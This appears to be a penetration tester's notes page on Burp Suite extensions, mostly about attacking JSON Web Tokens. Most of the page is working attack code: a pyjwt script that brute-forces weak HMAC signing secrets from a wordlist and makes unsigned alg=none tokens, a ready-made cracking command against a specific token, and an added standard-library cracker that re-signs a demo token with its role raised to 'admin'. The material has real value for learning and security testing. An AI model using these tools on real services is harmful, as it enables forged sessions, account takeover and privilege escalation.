1. Flow (traffic recording)

https://github.com/portswigger/flow
Records the traffic Burp sends, both the request packet and the response packet.

2. json-web-tokens (attacking JWT, forging signatures)

https://github.com/portswigger/json-web-tokens
If a request contains a JWT, the extension recognises it automatically
and decodes it (the header and payload are only base64url-encoded, not encrypted, so no key is needed to read them).
If the token is signed with a weak key, the key can be brute-forced (this only applies to the HS* algorithms, i.e. HMAC with a shared secret; RS*/ES* tokens have no secret to guess).
Brute-force script
Requires the pyjwt library: py -3 -m pip install pyjwt

    # jwtcrack.py (By:Ch1ng). Written against the PyJWT 1.x API; the decode()/encode() calls
    # below are adjusted so the script also runs on PyJWT 2.x (algorithms=[...] and a str return value).
    import jwt
    import json
    from optparse import OptionParser


    def runblasting(path, jwt_str, alg):
        # "none" cannot be brute-forced; fall back to HS256, the usual weak-secret case
        if alg == "none":
            alg = "HS256"
        with open(path, encoding='utf-8') as f:
            for line in f:
                key_ = line.strip()
                try:
                    jwt.decode(jwt_str, key=key_, algorithms=[alg])
                    print('found key! --> ' + key_)
                    break
                except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError,
                        jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
                    # claim validation only runs after the signature verified, so the key is correct
                    print('found key! --> ' + key_)
                    break
                except jwt.exceptions.InvalidSignatureError:
                    continue
                except jwt.exceptions.InvalidKeyError:
                    # e.g. a wordlist line that looks like a PEM key, which PyJWT refuses as an HMAC secret
                    continue
            else:
                print("key not found!")


    def generatejwt(dictstring, key='', alg='none'):
        jsstr = json.loads(dictstring)
        token = jwt.encode(jsstr, key=key, algorithm=alg)
        # PyJWT 1.x returns bytes, 2.x returns str
        return token.decode('utf-8') if isinstance(token, bytes) else token


    if __name__ == "__main__":
        parser = OptionParser()
        parser.add_option("-m", "--mode", action="store", dest="mode", default='', type="string",
                          help="Mode has generate disable encryption and blasting encryption key [generate/blasting]")
        parser.add_option("-s", "--string", action="store", dest="jwtstring", default='', type="string",
                          help="Input your JWT string")
        parser.add_option("-a", "--algorithm", action="store", dest="algorithm", default='none', type="string",
                          help="Input JWT algorithm default:NONE")
        parser.add_option("--kf", "--key-file", action="store", dest="keyfile", type="string", default=False,
                          help="Input your Verify Key File")
        (options, args) = parser.parse_args()
        if options.mode == "generate":
            print(generatejwt(options.jwtstring, alg=options.algorithm))
            exit()
        if options.mode == "blasting":
            runblasting(options.keyfile, options.jwtstring, options.algorithm)
            exit()
        else:
            print(
                '''
                _____ ____ ____ _________ ______ _______ _ ______ ___ ____
                |_ _||_ _| |_ _|| _ _ | .' ___ ||_ __ \ / \ .' ___ ||_ ||_ _|
                | | \ \ /\ / / |_/ | | \_|/ .' \_| | |__) | / _ \ / .' \_| | |_/ /
                _ | | \ \/ \/ / | | | | | __ / / ___ \ | | | __'.
                | |__' | \ /\ / _| |_ \ `.___.'\ _| | \ \_ _/ / \ \_\ `.___.'\ _| | \ \_
                `.____.' \/ \/ |_____| `.____ .'|____| |___||____| |____|`.____ .'|____||____|
                By:Ch1ng
                '''
            )
            print(parser.format_help())

Weak-key brute force, HS type

    py -3 jwtcrack.py -m blasting -s eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE1NzYxMjE1NDcsInVzZXJuYW1lIjoiemRqIiwicGFzc3dvcmQiOiIxMjMifQ.mkCLR5Kje9x-z8hRgWBMxnQm8hknOwV1Zd8uSZa3rQY --kf top6000.txt
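To show what the extension and the pyjwt-based script above actually compute, here is an added example (not part of the original page, the Burp extension, or Ch1ng's jwtcrack.py) that does the same weak-key brute force and the follow-up signature forgery with only the Python standard library. It generalises the page's HS256 case to HS384/HS512, and also builds an alg=none token for comparison. The secret, wordlist and claims it uses are constructed for the demo; only the PAGE_TOKEN value is taken from the command above (its secret is unknown here, so it is only decoded, not cracked).

```python
"""Added example: stdlib-only HS* JWT cracker and forger (not the page's or project's own code).
The secret, wordlist and claims below are constructed for the demonstration."""
import base64
import hashlib
import hmac
import json

# HS* algorithm name -> hash function; anything else (RS*, ES*, none) is not an HMAC
HS_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}

# The token from the brute-force command on this page (secret not known here)
PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJleHAiOjE1NzYxMjE1NDcsInVzZXJuYW1lIjoiemRqIiwicGFzc3dvcmQiOiIxMjMifQ."
              "mkCLR5Kje9x-z8hRgWBMxnQm8hknOwV1Zd8uSZa3rQY")


def b64url_encode(data: bytes) -> str:
    # JWT uses base64url without '=' padding
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # restore the padding the token strips before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token: str):
    """Split a compact JWS into (header dict, payload dict, signature bytes). No verification:
    header and payload are only encoded, which is why the extension can show them without a key."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    return header, payload, b64url_decode(sig_b64)


def sign_jwt(payload: dict, key: bytes, alg: str = "HS256") -> str:
    """Build a JWT. alg='none' yields an unsigned token (header.payload. with empty signature)."""
    header = {"alg": alg, "typ": "JWT"}
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    if alg == "none":
        return signing_input + "."
    mac = hmac.new(key, signing_input.encode(), HS_ALGS[alg]).digest()
    return signing_input + "." + b64url_encode(mac)


def crack_hs_key(token: str, wordlist):
    """Return the wordlist entry that reproduces the token's HMAC, or None.
    Only HS* tokens can be attacked this way: for RS*/ES* there is no shared secret to guess."""
    header, _, sig = decode_jwt(token)
    alg = header.get("alg", "")
    if alg not in HS_ALGS:
        return None
    signing_input = token.rsplit(".", 1)[0].encode()  # "header.payload" is what gets MACed
    for candidate in wordlist:
        key = candidate.strip().encode()
        mac = hmac.new(key, signing_input, HS_ALGS[alg]).digest()
        if hmac.compare_digest(mac, sig):
            return key.decode()
    return None


def forge_with_key(token: str, key: str, changes: dict) -> str:
    """Edit claims in the token's payload and re-sign it with the recovered secret,
    keeping the original algorithm so the server accepts it."""
    header, payload, _ = decode_jwt(token)
    payload.update(changes)
    return sign_jwt(payload, key.encode(), header["alg"])


# Constructed demo: a server that signs with a weak secret present in a short wordlist
DEMO_SECRET = "secret123"
DEMO_WORDLIST = ["password", "123456", "admin", "secret123", "jwtsecret"]  # stands in for top6000.txt
DEMO_TOKEN = sign_jwt({"exp": 1576121547, "username": "zdj", "role": "user"}, DEMO_SECRET.encode())

if __name__ == "__main__":
    print("page token payload:", decode_jwt(PAGE_TOKEN)[1])
    found = crack_hs_key(DEMO_TOKEN, DEMO_WORDLIST)
    print("found key -->", found)
    print("forged:", forge_with_key(DEMO_TOKEN, found, {"role": "admin"}))
```

The brute force hashes only "header.payload" with each candidate and compares the result to the third segment, which is exactly what pyjwt's `decode()` does per key in the script above; once a match is found, any payload can be re-signed with the same key, which is the "forging signatures" half of the attack.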
